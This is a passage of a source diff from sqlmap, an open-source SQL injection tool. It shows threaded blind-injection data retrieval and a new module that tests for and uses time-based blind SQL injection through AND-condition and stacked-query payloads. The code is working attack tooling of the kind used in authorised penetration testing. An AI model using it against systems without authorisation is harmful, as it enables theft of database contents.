+            except (sqlmapConnectionException, sqlmapValueException), errMsg:
+                conf.threadException = True
+                logger.error("thread %d: %s" % (numThread + 1, errMsg))
+
+            except KeyboardInterrupt:
+                conf.threadException = True
+
+                print
+                logger.debug("waiting for threads to finish")
+
+                try:
+                    while (threading.activeCount() > 1):
+                        pass
+
+                except KeyboardInterrupt:
+                    raise sqlmapThreadException, "user aborted"
+
+            except:
+                conf.threadException = True
+                errMsg = unhandledException()
+                logger.error("thread %d: %s" % (numThread + 1, errMsg))
+                traceback.print_exc()
+
+        # Start the threads
+        for numThread in range(numThreads):
+            thread = threading.Thread(target=downloadThread)
+            thread.start()
+            threads.append(thread)
+
+        # And wait for them to all finish
+        try:
+            alive = True
+            while alive:
+                alive = False
+                for thread in threads:
+                    if thread.isAlive():
+                        alive = True
+                        thread.join(5)
+        except KeyboardInterrupt:
+            conf.threadContinue = False
+            raise
+
+        # If we have got one single character not correctly fetched it
+        # can mean that the connection to the target url was lost
+        if None in value:
+            for v in value:
+                if isinstance(v, str) and v is not None:
+                    partialValue += v
+
+            if partialValue:
+                finalValue = partialValue
+                infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), finalValue)
+        else:
+            finalValue = "".join(value)
+            infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), finalValue)
+
+        if isinstance(finalValue, str) and len(finalValue) > 0:
+            dataToSessionFile(replaceNewlineTabs(finalValue))
+
+        if conf.verbose >= 1 and not showEta and infoMsg:
+            dataToStdout(infoMsg)
+
+        conf.seqLock = None
+    else:
+        index = firstChar
+
+        while True:
+            index    += 1
+            charStart = time.time()
+            val       = getChar(index, asciiTbl)
+
+            if val is None or ( lastChar > 0 and index > lastChar ):
+                break
+
+            finalValue += val
+
+            dataToSessionFile(replaceNewlineTabs(val))
+
+            if showEta:
+                etaProgressUpdate(time.time() - charStart, index)
+            elif conf.verbose >= 1:
+                dataToStdout(val)
+
+    if conf.verbose >= 1 or showEta:
+        dataToStdout("\n")
+
+    if ( conf.verbose in ( 1, 2 ) and showEta and len(str(progress)) >= 64 ) or conf.verbose >= 3:
+        infoMsg = "retrieved: %s" % finalValue
+        logger.info(infoMsg)
+
+    if not partialValue:
+        dataToSessionFile("]\n")
+
+    if conf.threadException:
+        raise sqlmapThreadException, "something unexpected happen into the threads"
+
+    return queriesCount[0], finalValue
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import time
+
+from lib.core.agent import agent
+from lib.core.common import getDelayQuery
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.request import inject
+from lib.request.connect import Connect as Request
+
+def timeTest():
+    infoMsg  = "testing time based blind sql injection on parameter "
+    infoMsg += "'%s' with AND condition syntax" % kb.injParameter
+    logger.info(infoMsg)
+
+    timeQuery = getDelayQuery(andCond=True)
+    query     = agent.prefixQuery(" AND %s" % timeQuery)
+    query     = agent.postfixQuery(query)
+    payload   = agent.payload(newValue=query)
+    start     = time.time()
+    _         = Request.queryPage(payload)
+    duration  = int(time.time() - start)
+
+    if duration >= conf.timeSec:
+        infoMsg  = "the parameter '%s' is affected by a time " % kb.injParameter
+        infoMsg += "based blind sql injection with AND condition syntax"
+        logger.info(infoMsg)
+
+        kb.timeTest = payload
+
+    else:
+        warnMsg  = "the parameter '%s' is not affected by a time " % kb.injParameter
+        warnMsg += "based blind sql injection with AND condition syntax"
+        logger.warn(warnMsg)
+
+        infoMsg  = "testing time based blind sql injection on parameter "
+        infoMsg += "'%s' with stacked query syntax" % kb.injParameter
+        logger.info(infoMsg)
+
+        timeQuery  = getDelayQuery(andCond=True)
+        start      = time.time()
+        payload, _ = inject.goStacked(timeQuery)
+        duration   = int(time.time() - start)
+
+        if duration >= conf.timeSec:
+            infoMsg  = "the parameter '%s' is affected by a time " % kb.injParameter
+            infoMsg += "based blind sql injection with stacked query syntax"
+            logger.info(infoMsg)
+
+            kb.timeTest = payload
+        else:
+            warnMsg  = "the parameter '%s' is not affected by a time " % kb.injParameter
+            warnMsg += "based blind sql injection with stacked query syntax"
+            logger.warn(warnMsg)
+
+            kb.timeTest = False
+
+    return kb.timeTest
+
+def timeUse(query):
+    start      = time.time()
+    _, _       = inject.goStacked(query)
+    duration   = int(time.time() - start)
+
+    return duration
--- a/lib/techniques/inband/init.py
+++ b/lib/techniques/inband/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/Show More
+++ b/Show More